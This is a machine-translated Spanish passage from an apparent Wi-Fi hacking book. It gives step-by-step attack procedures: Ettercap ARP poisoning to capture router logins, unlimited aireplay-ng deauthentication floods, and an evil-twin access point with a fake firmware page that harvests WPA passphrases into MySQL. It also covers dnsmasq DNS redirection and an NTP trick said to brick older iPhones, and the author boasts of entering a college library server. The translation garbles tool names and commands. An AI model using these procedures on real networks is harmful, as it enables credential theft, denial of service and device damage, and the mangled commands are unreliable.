cebolla1ÿ1ÿ
Es genial que incluso puedas invertir el orden de la máscara, significa que simplemente puedes poner el
máscara antes del archivo de texto. Hashcat aplicará fuerza bruta a las contraseñas de esta manera:
91
Machine Translated by Google
7a2ecarlos
8j3pie grande
0t3wguest
6a5joonion
Esta función se puede usar en cualquier lugar de Hashcat. No se limita solo al cracking WPA/2. Incluso si está
descifrando md5, SHA1, OSX, hashes de WordPress. Tan pronto como el proceso esté en ejecución, puede pausar/
reanudar el proceso en cualquier momento.
Simplemente presione [p] para pausar la ejecución y continuar con su trabajo.
Para reanudar presione [r]. Todos los comandos están justo al final de la salida durante la ejecución de
la tarea. Ver imagen a continuación
A veces, puede sentir esta característica como una limitación, ya que todavía tiene que mantener el sistema
despierto, para que el proceso no se borre de la memoria.
Y también tenemos una solución para eso. ¡Crea sesión!
Aquí nombré la sesión blabla. Puede ver en la imagen a continuación que Hashcat ha guardado la sesión con el
mismo nombre, es decir, blabla y en ejecución.
92
Machine Translated by Google
Ahora puede simplemente presionar [q] cerrar cmd, apagar el sistema, volver de vacaciones, encender
el sistema y reanudar la sesión. ¡Así de fácil!
¿Cómo restaurar?
Esto es todo por Hashcat. Espero que lo entiendas bien y lo interpretes. No hay necesidad de estar
triste si no tiene suficiente dinero para comprar esas costosas tarjetas gráficas . para este propósito,
aún puede intentar descifrar las contraseñas a altas velocidades utilizando las nubes. Solo tienes que
pagar en consecuencia.
93
Machine Translated by Google
Características
dependencias
[Link] está diseñado específicamente para Kali Linux, pero también funcionará en otras versiones de Linux.
Asegúrese de que las dependencias estén instaladas en la máquina
1. Pirita, y
2. Empanada de vaca
Ambas herramientas vienen preinstaladas en Kali Linux, pero el script también admite el procedimiento de
instalación. Eso significa que si las herramientas requeridas (Pyrit/Cowpatty) no están instaladas, [Link] lo
descargará e instalará automáticamente antes de proceder a generar PMK.
Se vuelve realmente útil cuando desea generar PMK solo en un sistema aleatorio que cruza y olvida o no desea instalar
manualmente las herramientas necesarias cada vez.
Aircrack Boost Script hace esto por usted y eso también nos ahorra 2 secciones más aquí de instalar ambas
herramientas.
Entonces, todo lo que necesita tener es [Link] y una conexión a Internet que funcione (solo para descargar) y ¡está listo
para rockear!
No perdamos más el tiempo, veamos cómo ejecutarlo y usarlo primero.
Puede descargar el script desde [Link]
94
Machine Translated by Google
Ejecutar
De forma predeterminada, el script muestra el menú de ayuda. Aquí puede ver 2 formas de proceder según su necesidad.
Desglose de comandos:
Lista de palabras: [Link]
NOTA IMPORTANTE: Ponga el “SSID” entre comillas si incluye espacios en el nombre para evitar errores.
¡Pausa aquí! Veamos ahora cómo pasaremos el argumento a través de la entrada estándar y luego continuaremos con
la parte restante.
Para usar esta función, simplemente pase la opción '-r' al script. Comenzará a leer desde la entrada estándar, es decir,
teclado/ratón.
./[Link] -r
Esta es la mejor parte en mi opinión. No es necesario ingresar rutas súper largas a los archivos ubicados en lo profundo
del océano de directorios. ¡Simplemente arrastre y suelte!
Ahora que ha ingresado los nombres de archivo requeridos y el SSID utilizando cualquiera de los métodos, seleccione
la herramienta para generar PMK según su demanda.
Recordar,
95
Machine Translated by Google
Pyrit es una herramienta multiproceso. Utilizará el 100 % de todos los núcleos de su CPU (GPU, si es utilizable).
ver salida htop :
Es mucho más rápido que la segunda opción, es decir , genpmk, instalado con cowpatty.
Es una herramienta de subproceso único y siempre utilizará un solo núcleo de su CPU. Eso lo hace mucho más
lento que Pyrit, pero es muy útil cuando no desea asignar todos los núcleos para el descifrado y solo quiere quedarse
con 1 núcleo para la generación de PMK y descansar para sus tareas.
Vale la pena como opción. Por lo tanto, elija sabiamente. Para fines de demostración, voy con "1" , es decir, Pyrit.
¡Eso es todo! tu trabajo está hecho. Siéntate y relájate. Espere a que Pyrit genere los PMK y luego [Link] intentará
descifrar el WPA/2-PSK de los hashes generados a una velocidad súper alta.
96
Machine Translated by Google
Este ataque es muy específico en su tipo y puede ser realmente útil y ahorrador de tiempo cuando está probando el PIN
para SSID comunes como Airtel, Linksys, Starbucks, Belkin , etc.
Hay millones de enrutadores que todavía usan el nombre predeterminado como nombre de AP.
[Link] puede ayudarlo a ahorrar mucho tiempo sin mucho dolor de cabeza.
97
Machine Translated by Google
5
Post-explotación de la
Red
Introducción
Suponiendo que haya ingresado a una red, este capítulo arroja algo de luz sobre lo que puede hacer para
comenzar a realizar pruebas de penetración dentro del alcance de una red. Temas como:
• ¿Qué es una subred?
• Instalación de herramientas
Antes de comenzar necesitas saber qué es una subred, si ya lo sabes puedes deslizarte hacia abajo.
98
Machine Translated by Google
Por lo general, una subred puede representar todas las máquinas en la misma red de área local (LAN)
ifconfig wlan0
wlan0: flags=4163<ARRIBA, TRANSMISIÓN, EN EJECUCIÓN, MULTITRANSMISIÓN> mtu 1500
inet [Link] máscara de red [Link] transmisión [Link]
inet6 fe80::d6d2:9304:4672:98aa prefijolen 64 scopeid 0x20<enlace>
éter [Link] txqueuelen 1000 (Ethernet)
Paquetes RX 6 bytes 1576 (1,5 KiB)
Errores de RX 0 caídos 0 excesos 0 marco 0
Paquetes TX 19 bytes 2394 (2,3 KiB)
Errores de TX 0 caídas 0 excesos 0 operador 0 colisiones 0
Puede notar que solo la última parte de la máscara es '0'. Describe que su rango de IP variará en el
último lugar solo de 1-254. Como .0 y .255 son los nodos de red reservados por el propio router.
Por ejemplo,
Nuestra dirección IP es [Link], tener una máscara de subred [Link] dice que nuestra red
solo contendrá direcciones IP (dispositivos) con IP a partir de [Link] a [Link].
Si la subred es [Link], entonces el rango dinámico serán las últimas 2 columnas de la dirección IP, es decir
192.168.*.*
Aquí el asterisco (*) es la parte variable. Que puede ir desde 1-254.
Hay algunos conceptos más acc. a qué subred puede ir como [Link] en su lugar, y concepto de
clases en subredes que cambia según el rango de IP. Me gustaría que leyera sobre esos conceptos para obtener un
poco de claridad sobre la creación de redes. ver aquí
Entenderemos un concepto que se usará en este tutorial. Si escribe su máscara de subred en binario
99
Machine Translated by Google
Entonces, ¿de qué sirve este 24? Esto se utiliza para facilitar que los escáneres de red indiquen el rango de
direcciones IP que estamos interesados en escanear simplemente pasando '/24' junto con la dirección IP al
escáner. Escáneres como nmap o sniffers como ettercap. Que vamos a utilizar en breve.
Herramientas utilizadas
nmap (mapeador de red) es un escáner de seguridad, originalmente escrito por Gordon Lyon , que se usa para
descubrir hosts y servicios en una red informática, construyendo así un "mapa" de la red.
Para lograr su objetivo, Nmap envía paquetes especialmente diseñados a los hosts de destino y luego analiza las
respuestas. nmap viene preinstalado en Kali Linux y en casi todas las distribuciones de Linux.
También puede descargar el código fuente de nmap para Windows y MacOS desde [Link].
[Link]
ettercap es una suite para ataques man in the middle en LAN. Cuenta con rastreo de conexiones en
vivo, filtrado de contenido sobre la marcha y muchos otros trucos interesantes.
Instalacion y configuracion
Instalar nmap desde el código fuente
Descargue el código fuente y ejecútelo en la Terminal:
tar xvf nmap*.tar.bz2 cd #Extracto
nmap*/ ./configure #Cambio de directorio
hacer
sudo hacer instalar #Instalar archivos binarios/man-pages y configuraciones en el sistema
100
Machine Translated by Google
Escaneo de la subred
Usaré 2 herramientas para demostrar el concepto de escaneo de la red y más Pentesting.
Aprenderemos Ettercap un poco más en detalle que nmap , ya que le mostrará cómo escanear y olfatear
la red para recopilar las credenciales pasadas a través del enrutador, cómo hacerlo y las contramedidas.
Vamos a empezar,
nmap [Link]/24
[Link] es la dirección IP de Kali Linux y /24 se usa como máscara, que es [Link]. Verifique la
configuración de su red, puede diferir.
Este comando simplemente escaneará el rango [Link] - [Link] y volcará la salida que muestra
las direcciones IP y los servicios correspondientes que se ejecutan en los dispositivos.
nmap ofrece opciones de tiempo para reducir el tiempo de escaneo o el estrés de la red y/o evadir IDS
(Sistemas de detección de intrusos) según sea necesario.
La salida se muestra solo cuando se completa el escaneo, aunque puede presionar <TAB> para verificar el
progreso del escaneo, pero no siempre es útil presionar <TAB> todo el tiempo. Entonces, usamos algunos
argumentos de nmap para acelerar el escaneo y mostrar la salida en tiempo real.
101
Machine Translated by Google
Aquí, -T le dice a nmap que use la opción de sincronización y -v significa salida detallada
nmap ofrece 6 opciones de tiempo.
0: paranoico
1: astuto
2: Cortés
3: normales
4: agresivo
5: Loco
nmap [Link]/24 -T 5 -v
Los dos primeros son para la evasión de IDS. El modo educado ralentiza el escaneo para usar menos ancho de banda y
recursos de la máquina de destino. El modo normal es el predeterminado, por lo que -T 3 no hace nada. El
modo agresivo acelera el escaneo al suponer que se encuentra en una red razonablemente rápida y confiable.
Finalmente, el modo insano asume que estás en una red extraordinariamente rápida o que estás dispuesto a
sacrificar algo de precisión por la velocidad.
Producción:
Como puede ver en la salida anterior, nmap muestra los puertos abiertos y los servicios correspondientes
de todos los hosts activos. Verá la diferencia cuando lo ejecute en vivo. ¡Hazlo ahora!
usted podría estar pensando ahora qué?
Como puede ver en la imagen de arriba, no elegiremos [Link], ya que es el enrutador en sí, lo cubriremos
en la siguiente sección. Pero vemos que 2 puertos (SSH y HTTP) están abiertos para el host [Link].
Ahora podemos realizar varios ataques en este host específico. Ataques como fuerza bruta en SSH
102
Machine Translated by Google
(puerto 22). Intente abrir [Link] en el navegador y verifique si se está ejecutando algún servicio basado
en la web para que podamos explotarlo solo desde allí o no.
Los diferentes sistemas tienden a tener diferentes servicios en ejecución y, en consecuencia, las pruebas de penetración difieren. He
deshabilitado todos los puertos innecesarios para que nmap no muestre ningún servicio/puerto.
Ingresé al servidor de la biblioteca de My College desde mi habitación del albergue simplemente usando
un servicio que se ejecuta en un servidor remoto a través del navegador. Pude acceder/cerrar la administración
y/o el sistema completo de la biblioteca. Entonces, desde aquí conoces el poder de escanear
(reconocimiento) usando nmap.
Las autoridades de la universidad informaron y corrigieron la vulnerabilidad poco después.
Pasando a Ettercap. Ya hemos instalado Ettercap. Ahora ejecute Ettercap desde la Terminal.
Primero aprenderemos a usar la GUI de Ettercap para mantenerlo simple y fácil al principio.
Ejecutar en la Terminal:
Sudo Ettercap -G
Ahora, como queremos olfatear la red, primero debemos entender cómo puede ser esto posible.
entendamos!
Sabemos que todos los datos de un dispositivo se transfieren a través del enrutador y el enrutador distingue
entre dispositivos usando sus direcciones MAC. Si de alguna manera pudiéramos hacernos pasar por el
enrutador, ¿no comenzarían los dispositivos a enviarnos ([Link]) todo su tráfico? suena legítimo,
¿verdad?
Sí, lo es. Esto es lo que es un MiTM, o Man-in-The-Middle Attack. Se realiza envenenando el ARP (Address
Resolution Protocol) tablas del dispositivo.
En el que el atacante se interpone entre el enrutador y los dispositivos y actúa como enrutador para los
dispositivos. luego, los dispositivos envían todos sus datos al atacante y el atacante luego registra los datos
y reenviarlo al enrutador.
103
Machine Translated by Google
Las respuestas ARP no solicitadas son paquetes de respuesta ARP recibidos por una máquina que la máquina nunca
solicitó; es decir, nunca se envió una solicitud ARP al nodo del que proviene la respuesta ARP.
Esto permite que un hacker falsifique una respuesta ARP en la que los campos de dirección IP y dirección MAC se
pueden configurar en cualquier valor. La víctima que recibe este paquete falsificado aceptará la respuesta y cargará
el par MAC/IP contenido en el paquete en la tabla ARP de la víctima.
Realicemos el ataque de envenenamiento ARP.
104
Machine Translated by Google
A partir de aquí, Ettercap administrará el ataque, solo necesita monitorear la salida que se muestra en la columna inferior.
Cuando comencé a olfatear, abrí el navegador en la máquina con Windows, es decir, Victim ([Link]), me
conecté a través de Wi-Fi y abrí la interfaz web del enrutador ([Link]) y probé 3 combinaciones diferentes de nombre
de usuario: contraseña, las primeras 2 incorrectas y la tercera uno correcto y tan pronto inicié sesión con las credenciales
admin:adminf y testuser:testpass son las credenciales de inicio de sesión del enrutador incorrectas que la víctima intentaba iniciar
sesión en el enrutador. Mientras que cuando se ingresaba rootsh3ll:iamrootsh3ll, se podía acceder a todas las páginas a través
del navegador de la víctima, cuyo tráfico pasaba a través del sistema del atacante en formato de texto sin formato (HTTP) sin
cifrar .
Ettercap no capturará las credenciales de los sitios web que se ejecutan sobre SSL. La detección de sitios web habilitados
para SSL requiere que se solucionen muchos problemas, como certificados firmados, SSL, HSTS . Lo aprenderemos en una
Por lo tanto, pudimos recuperar las credenciales de inicio de sesión web del enrutador sin siquiera obtener información física.
105
Machine Translated by Google
acceso a la víctima.
Genial, ¿no? bueno, eso es solo el comienzo. Puede usar las credenciales del enrutador para varias operaciones, como:
1. Filtrar otras MAC para acceder a Internet o a la interfaz web del enrutador.
Oler el enrutador es solo una cosa que puede explorar, hay muchas otras técnicas que podemos aprender para
probar la fuerza de la red o los dispositivos.
Cubriremos uno por uno en detalle. Solo hágame saber sus puntos de vista para seguir adelante y mejorar la calidad de
cada publicación. Vea cómo se ve la interfaz del enrutador desde el sistema del atacante.
106
Machine Translated by Google
Echar un vistazo:
Si nota que la dirección MAC del enrutador (0.1) en la primera ejecución es diferente a la MAC del atacante en
este caso, es decir, 0.100
Cuando ejecuté el comando nuevamente después de iniciar el ataque MiTM, desde el punto de vista de la
víctima, el enrutador ahora es [Link].
¿Cómo?
Dentro de una red, los datos se transfieren utilizando las direcciones MAC de los dispositivos conectados. Asi que,
a medida que se falsifica la MAC del enrutador (para la víctima), la víctima comienza a enviar tráfico a la
MAC del atacante, que en este caso pretende ser el enrutador.
Espero que quede claro hasta ahora, ya que vamos a cubrir un aspecto diferente de estar fuera de la red.
avancemos
107
Machine Translated by Google
¿Cómo funciona?
Creamos un paquete usando aireplay-ng del conjunto de herramientas aircrack-ng y lo transmitimos en el aire
que luego es recibido por los usuarios. El cliente comprueba el paquete en busca de su fuente. Solo hay una
forma de que el dispositivo cliente sepa esto, el encabezado del paquete. Donde el dispositivo puso su
dirección MAC, y eso puede ser alterado. Lo haremos usando aireplay-ng. Más adelante estudiaremos en
detalle cómo hacerlo mediante programación.
Fuente: Wikipedia
Ejecutar en la Terminal:
Se puede usar cero (0) en lugar de --deauth y poner el SSID entre comillas para evitar conflictos. -0:
108
Machine Translated by Google
0 Desautenticación
1 Autenticación falsa
2 Reproducción de paquetes interactivos
-0 0, o --deauth 0 significa solicitudes de deautenticación ilimitadas, --deauth 5 significa que aireplay-ng enviará 5 paquetes de
Esto fue para transmitir los paquetes de deauth para bloquear la red, ¿qué pasa si el atacante quiere bloquear el acceso a la red solo
Simplemente use la opción -c para decirle a aireplay-ng qué cliente desea DoS.
¿Recuerdas cuando intentamos desconectar al cliente enviando 5 paquetes de desautorización para capturar el protocolo de enlace
WPA/2? Si, es lo mismo. Si solo usa 0 en lugar de 5, aireplay-ng enviará paquetes sin cesar al cliente, lo que resultará en que no
109
Machine Translated by Google
6
Punto de acceso no autorizado:
Introducción
Visión de conjunto
"Un punto de acceso Wi-Fi falso es un punto de acceso inalámbrico que se ha instalado en una red segura sin la autorización
explícita de un administrador de red local, ya sea agregado por un empleado bien intencionado o por un atacante malicioso" -
Wikipedia
Todos los métodos que hemos visto hasta ahora eran demasiado lentos o consumían demasiados recursos.
¿No sería mejor si pudiéramos recopilar la contraseña de Wi-Fi en texto sin formato para ahorrar tiempo, esfuerzo, energía y
Esto es posible utilizando el punto de acceso Fake Wi-Fi o el infame método Evil-Twin.
110
Machine Translated by Google
Anteriormente, hasta Kali Linux 1.x, solíamos crear el punto de acceso Wi-Fi falso y unir la interfaz con la interfaz
predeterminada de la máquina virtual usando la utilidad brctl , pero desde Kali Linux 2.0 , brctl no es compatible y
también dhcp3-server se cambia a isc-dhcp-server que causa demasiados problemas al usar scripts de automatización.
No usaremos ningún script automatizado, sino que entenderemos el concepto y trabajaremos para que pueda
realizarlo manualmente, hacer su propio script para automatizar la tarea, simplificar la vida y fortalecerlo.
Escanear el aire en busca de solicitudes de sondeo de clientes puede llevarlo a descifrar la frase de contraseña
WPA2-PSK sin ningún punto de acceso existente o, a veces, sin ningún apretón de manos.
Herramientas utilizadas
Preparación de ataque
“Denme seis horas para talar un árbol y pasaré las primeras cuatro afilando el hacha”
111
Machine Translated by Google
-Abraham Lincoln
La preparación de este ataque lleva la mayor parte del tiempo, ya que incluye la instalación de herramientas, la
configuración y la instalación del punto de acceso no autorizado en el servidor apache y la gestión del flujo de tráfico
de la red.
Aunque la parte manual del ataque es solo la desautenticación del cliente, el resto está automatizado.
Instalación
El paquete de herramientas aircrack-ng, apache, mysql, iptables ya está instalado en nuestra máquina virtual Kali
Linux.
Instalar isc-dhcp-servidor
Ejecutar en la Terminal:
actualización adecuada
Esto actualizará el caché del paquete e instalará la última versión del servidor dhcp en su Kali Linux.
112
Machine Translated by Google
Todas las herramientas necesarias están instaladas. Necesitamos configurar Apache y el servidor DHCP para
que el punto de acceso asigne la dirección IP al cliente/víctima y puedan acceder a nuestra página web de forma
remota.
Este comando extraerá el contenido del archivo rogue_AP.zip y lo copiará en el directorio de trabajo de apache.
Cuando la víctima abre el navegador, será redirigido automáticamente a la página web [Link] predeterminada .
Para almacenar las credenciales ingresadas por la víctima en la página html, necesitamos una base de datos SQL.
En el directorio extraído, verá el archivo [Link] , pero para que tenga efecto necesita crear una base de
datos. [Link] reflejará y luego reflejará los cambios en el apropiado
DB.
Si selecciona * de wpa_keys; refleja los valores ingresados anteriormente, su base de datos está funcionando
113
Machine Translated by Google
bien.
nano /etc/dhcp/[Link]
Cuando dhcpd se instala por primera vez, no hay una base de datos de arrendamiento. Sin embargo, dhcpd requiere que
esté presente una base de datos de arrendamiento antes de que se inicie. Para crear la base de datos de arrendamiento
inicial, simplemente cree un archivo vacío llamado /var/lib/dhcpd/[Link]. Puedes crear esto manualmente:
toque /var/lib/dhcpd/[Link]
Una forma es ejecutar airmon-ng check kill cada vez que comience la prueba de Wi-Fi. Por otro lado, es posible que desee
utilizar el administrador de red para encargarse de otras interfaces de red como ethernet, dongles, etc.
Para solucionar este conflicto, simplemente dígale al administrador de red que no administre nuestro dispositivo Wi-Fi.
Él te escuchará confía en mí.
Para que no necesite matar al administrador de red o desconectar cualquier conexión de red antes de poner el adaptador
inalámbrico en modo monitor. Proporcione un identificador único del dispositivo (Dirección MAC) al administrador de red, no
volverá a meterse con él.
114
Machine Translated by Google
gedit /etc/NetworkManager/[Link]
Agregue el siguiente código para ignorar el dispositivo con la dirección MAC deseada
[archivo de clave]
Separe varios dispositivos con comas. Ej: mac: [Link], mac: [Link]
Recopilación de información
Es muy recomendable guardar la información de la víctima de antemano. Simplemente te ahorrará tiempo y te ayudará en momentos
de pánico.
airodump-ng wlan0mon
CH 1 ][ Transcurrido: 3 s ][ 2017-07-12 22:12
BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID
64: 66: B3: 6E: B0: 8A -22 79 436 9 0 1 54e WPA2 CCMP PSK raícesh3ll
54: B8: 0A: 8E: 36: 00 -73 0 138 0 0 1 54e WEP WEP abhinav
Tan pronto como su AP de destino aparezca en la ventana de salida de airodump-ng, presione CTRL-C y anote estas tres cosas en un
Si su país está configurado en EE. UU. durante la instalación. lo más probable es que su tarjeta funcione en 30
115
Machine Translated by Google
dB (1000 mW)
¿Por qué necesitamos cambiar de región para operar nuestra tarjeta a 1000mW?
Porque los diferentes países tienen diferentes permisos legales de dispositivos inalámbricos en cierta potencia
y frecuencia. Es por eso que la distribución de Linux tiene esta información incorporada y necesita cambiar su
región para permitirse operar en esa frecuencia y potencia.
El motivo de encender la tarjeta es que al crear el punto de acceso, no es necesario estar cerca de la víctima.
El dispositivo de la víctima se conectará automáticamente al dispositivo con mayor intensidad de señal, incluso si
no está físicamente cerca.
Configurar redes
Encienda el punto de acceso falso
De forma predeterminada, airbase-ng crea una interfaz de toque (at0) como una interfaz cableada
virtual para puentear/enrutar el tráfico de red a través del punto de acceso no autorizado. Verifique con ifconfig at0.
Para que at0 asigne la dirección IP a la víctima, primero debe asignarse un rango de IP.
116
Machine Translated by Google
El comando route había configurado [Link] como dirección de red, [Link] como máscara de subred y [Link] como
No confunda entre dirección de red y puerta de enlace predeterminada. La dirección de red también se denomina nodo de red. Los
nodos son la dirección IP reservada de cualquier rango específico. "XXX0" y "XXX255" siempre están reservados, por eso el rango de
IP siempre varía de XXX1-254
Una dirección que termina en ".255" también se denomina dirección de transmisión: todos los dispositivos en la misma red deben manejar
Usaremos la interfaz Ethernet predeterminada (eth0) después de asignar la dirección IP y la máscara de subred a la interfaz
at0. Esto nos permitirá acceder a Internet dentro de la máquina virtual para enrutar todo el tráfico del cliente a través de ella.
En resumen, permitir que la víctima acceda a Internet y permitirnos a nosotros mismos (atacante) rastrear el tráfico de la
víctima.
Para eso, usaremos la utilidad iptables para establecer una regla de firewall para enrutar todo el tráfico a través de esta
interfaz específica.
ruta ip
predeterminado a través de [Link]
dev eth0 [Link]/24 dev eth0 proto kernel scope link src [Link]
En este caso, la dirección IP de la interfaz predeterminada es [Link], la suya puede ser diferente
Después de ingresar el comando anterior, si está dispuesto a proporcionar acceso a Internet a la víctima, habilite el
enrutamiento ipv4.
Habilitar el reenvío de IP
117
Machine Translated by Google
valor de eco:
Las reglas de iptables no son persistentes, aunque las reglas permanecerán definidas hasta el próximo reinicio.
Lo pondremos en 0 para este ataque, ya que no proporcionamos acceso a Internet antes de obtener la contraseña
WPA.
El punto de acceso falso está activo, las herramientas están configuradas y las reglas están habilitadas. Ahora inicie el servidor dhcp para
permitir que el AP falso permita que los clientes se autentiquen.
Primero, debemos decirle al servidor dhcp la ubicación del archivo que creamos anteriormente, que define la clase de IP,
la máscara de subred y el rango de la red.
Tenemos nuestro punto de acceso Wi-Fi falso funcionando perfectamente. Después de la autenticación adecuada, la
víctima verá la página web mientras navega y probablemente ingresará la frase de contraseña que usa para el punto de
acceso inalámbrico.
¡Ataque!
Nuestro ataque ya está listo, solo espere a que el cliente se conecte y vea venir las credenciales.
En la mayoría de los casos, es posible que el cliente ya esté conectado al AP original. Debe desconectar el cliente como
lo hicimos en los capítulos anteriores usando la utilidad aireplay-ng .
118
Machine Translated by Google
Desglose de comandos:
--muerte 0: Para solicitudes ilimitadas de desautenticación. Limite la solicitud con cualquier número entero +ve
-un: Dirección MAC del enrutador, también conocido como BSSID
Estamos usando 0 para que cada cliente se desconecte de ese BSSID específico y se conecte a nuestro AP,
ya que coincide con el ESSID AP real y es una red de tipo abierto .
Tan pronto como un cliente se conecte a su AP, verá una respuesta de actividad en la ventana de terminal
de airbase-ng como esta:
Para simular el lado del cliente, estoy usando el navegador Firefox que se ejecuta en una máquina
Ubuntu conectada a través de un punto de acceso Wi-Fi falso para ilustrar el ataque.
Cuando la víctima intenta acceder a cualquier sitio web ([Link] en este caso), verá esta página que le
pide a la víctima que ingrese la contraseña WPA2 para descargar y actualizar el firmware.
Aquí estoy ingresando "iamrootsh3ll" como la contraseña que yo (Víctima) creo que es la contraseña
de mi AP.
Tan pronto como la víctima presione [ENTER] , verá esto
119
Machine Translated by Google
Volviendo al lado del atacante. Debe verificar en la base de datos MySQL las contraseñas almacenadas.
Simplemente escriba el comando utilizado anteriormente en la ventana del terminal MySQL y vea si la tabla
está actualizada o no.
Después de simular, verifiqué MySQL DB y aquí está el resultado
¡Voila! usted ha cosechado con éxito la frase de contraseña WPA directamente de la víctima en simple
texto.
Ahora puede cerrar todas las ventanas de la terminal y volver a conectarse al AP real para verificar si
la contraseña es correcta o si la víctima fue en realidad un delincuente fácil y lo engañó. ja ja
No necesita nombrar ningún AP similar a un AP existente, también puede crear un nombre de tipo de Wi-Fi abierto y aleatorio
para reunir al cliente en su AP y comenzar a realizar pruebas.
Esa es una máquina gratis para ti para pruebas de penetración.
Hay muchísimas posibilidades de ataques y técnicas usando puntos de acceso falsos que revelaré en los
próximos capítulos. Hasta entonces sigue probando
120
Machine Translated by Google
airbase-ng es una pequeña herramienta agradable con opciones muy limitadas junto con un servidor isc-dhcp-server
completo, hambriento de memoria y difícil de mantener que en sí mismo no se requiere en niveles operativos mínimos
o especialmente cuando está trabajando en integrado, menor dispositivos potentes como raspberry pi.
hostapd ( daemon de punto de acceso de host ) es un punto de acceso de software muy flexible y liviano capaz de
convertir NIC normales en puntos de acceso completos (reales) y autenticación
servidores.
Hostapd junto con apache puede hacer muchas cosas interesantes, pero algunos de esos aspectos se tratarán en este
libro.
Antes de saltar directamente a las posibilidades de un AP falso, debe asegurarse de que nuestros archivos de
configuración estén bien configurados.
Esto permitirá que uno esté listo para usar de acuerdo con el escenario y ahorraría mucho tiempo.
• BSSID: Identificador de conjunto de servicios básicos, también conocido como dirección MAC AP
• Número de canal
Creamos un punto de acceso con el mismo nombre que nuestro AP de destino (rsX), aunque el canal operativo
puede ser diferente.
Desautentice al cliente del AP real. Espere a que se conecte a nuestro AP falso (rsX)
En el momento en que la víctima se asocia con nuestro AP falso, se le asigna una dirección IP.
121
Machine Translated by Google
• Explotar en la máquina
• Robar credenciales
Pero para que todo esto sea posible, debe estar preparado con sus herramientas. como se dice
“Un artesano es tan bueno como sus herramientas”
Ajuste de configuración
Hostapd
Para crear un tipo específico de punto de acceso, ya sea WPA/2 personal, empresarial o karma attack.
Dnsmasq
Servidor ligero DNS/DHCP. Se utiliza para resolver solicitudes de dns desde/hacia una máquina y también actúa como servidor
DHCP para asignar direcciones IP a los clientes.
apache
Básicamente, actúa como un servidor web para el cliente (víctima). Pero puede trascender las capacidades de su servidor
web y AP falso utilizando esta poderosa herramienta, apache.
mysql
Toda la información del cliente se almacena en la base de datos. Por lo tanto, es mejor que tenga una base de datos
Se requieren hostapd y dnsmasq en cualquier caso en el que desee configurar una aplicación falsa. Aunque hay algunas
Ejemplo:
Supongamos que forzó la conexión de la víctima a su AP y simplemente quiere olfatear o redirigir el tráfico.
Pero en caso de que desee responder a las solicitudes basadas en la web realizadas por la víctima, puede manipularlas
de cierta manera para obtener la máxima información confidencial.
122
Machine Translated by Google
Aprenderemos sobre diferentes escenarios de ataque y la variedad de roles de apache y mysql en él.
Pero antes de eso, configuremos las herramientas fundamentalmente requeridas, es decir , hostapd, dnsmasq
Instalación:
Asegúrese de que esté instalada la última versión de las herramientas:
actualización adecuada
Configurar hostapd
Cree un directorio para los archivos de configuración guardados. Abra la Terminal y cree el archivo de configuración
hostapd.
vi [Link]
Asegúrese de editar los cambios en consecuencia cada vez que realice un ataque.
Configurar dnsmasq
vi [Link]
interface=<Nombre de interfaz AP falso>
dhcp-rango=[Link],[Link],[Link],12h
opción-dhcp=3,[Link]
opción-dhcp=6,[Link]
servidor=[Link]
consultas de registro
log-dhcp
escucha-dirección=[Link]
Desglose de parámetros:
dhcp-rango=[Link],[Link],12h: La dirección IP del cliente variará de [Link] a [Link], la máscara
de subred de red es [Link] y la concesión predeterminada
el tiempo es de 12 horas.
[Link]
123
Machine Translated by Google
cd ~ / Escritorio / fakeap /
hostapd [Link]
cd ~ / Escritorio / fakeap /
ifconfig wlan0 [Link] dnsmasq #establecer la dirección IP de clase A en wlan0
-C [Link] -d # -C: archivo de configuración. -d: modo daemon (como un proceso)
tan pronto como la víctima se conecte, debería ver un resultado similar para las ventanas de terminal hostapd y
dnsmasq:
hostapd:
Usando la interfaz wlan0 con hwaddr [Link] y ssid "rootsh3ll"
wlan0: estado de la interfaz NO INICIALIZADO->HABILITADO
wlan0: AP-HABILITADO
wlan0: STA [Link] IEEE 802.11: autenticado
wlan0: STA [Link] IEEE 802.11: asociado (ayuda 1)
wlan0: AP-STA-CONECTADO [Link]
wlan0: STA [Link] RADIUS: iniciando la sesión de contabilidad 596B9DE2-00000000
dnsmasq:
dnsmasq: iniciado, versión 2.76 tamaño de caché 150
dnsmasq: opciones de tiempo de compilación: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack
ipset auth DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCP, intervalo de IP [Link] -- [Link], tiempo de concesión 12 h
dnsmasq: usando el servidor de nombres [Link]#53
dnsmasq: leyendo /etc/[Link]
dnsmasq: usando el servidor de nombres [Link]#53
dnsmasq: usando el servidor de nombres [Link]#53
dnsmasq: leer /etc/hosts - 5 direcciones
dnsmasq-dhcp: 1673205542 rango DHCP disponible: [Link] -- [Link]
dnsmasq-dhcp: 1673205542 el cliente proporciona el nombre: rootsh3ll-iPhone
dnsmasq-dhcp: 1673205542 DHCPDISCOVER(wlan0) [Link] dnsmasq-dhcp:
1673205542 etiquetas: wlan0
dnsmasq-dhcp: 1673205542 DHCPOFFER(wlan0) [Link] [Link] dnsmasq-dhcp:
1673205542 opciones solicitadas: 1:netmask, 121:classless-static-route, 3:router, <-- ---------------------------------------
RECORTE---------- ------------------------------->
124
Machine Translated by Google
¿Escuchó sobre el error de 1970 de iOS al falsificar el servidor NTP (protocolo de tiempo de red), donde si configura una fecha
de iOS < 10.1.1 al 01/01/1970, bloqueará su dispositivo permanentemente sin posibilidad de reparación? Sí,
eso es tan fácil como cambiar esta opción al código del servidor NTP:
# Servidor NTP
opción-dhcp=42,[Link]
42 le dice a dnsmasq que redirija todas las solicitudes NTP para sincronización de tiempo a [Link], es decir, cualquier
interfaz de nuestra máquina.
Aquí hay una configuración para NetBIOS, tenga en cuenta que no la necesitamos en nuestra configuración actual
#44-47 NetBIOS
opción-dhcp=44,[Link]
opción-dhcp=45,[Link]
opción-dhcp=46,8
opción-dhcp=47
servidor=[Link]: Opcional para el servidor DNS público, donde [Link] es el DNS de Google
dhcp: listen-address=[Link]: Dnsmasq escuchará en localhost el tráfico local/redireccionado. Para que Internet también funcione en nuestra máquina, si
es necesario
Configuraciones opcionales
Puede crear un archivo [Link] opcional para dnsmasq para permitirle redirigir el tráfico de un sitio web de destino a
vi [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
[Link] [Link]
Eso es todo. Simplemente pase el archivo con el indicador -H a dnsmasq y todo su tráfico para estos sitios se
125
Machine Translated by Google
También puede usar varias direcciones IP (1 IP/dominio) para redirigir el tráfico a otra máquina, ya sea una IP
pública o privada, por ejemplo:
[Link] [Link]
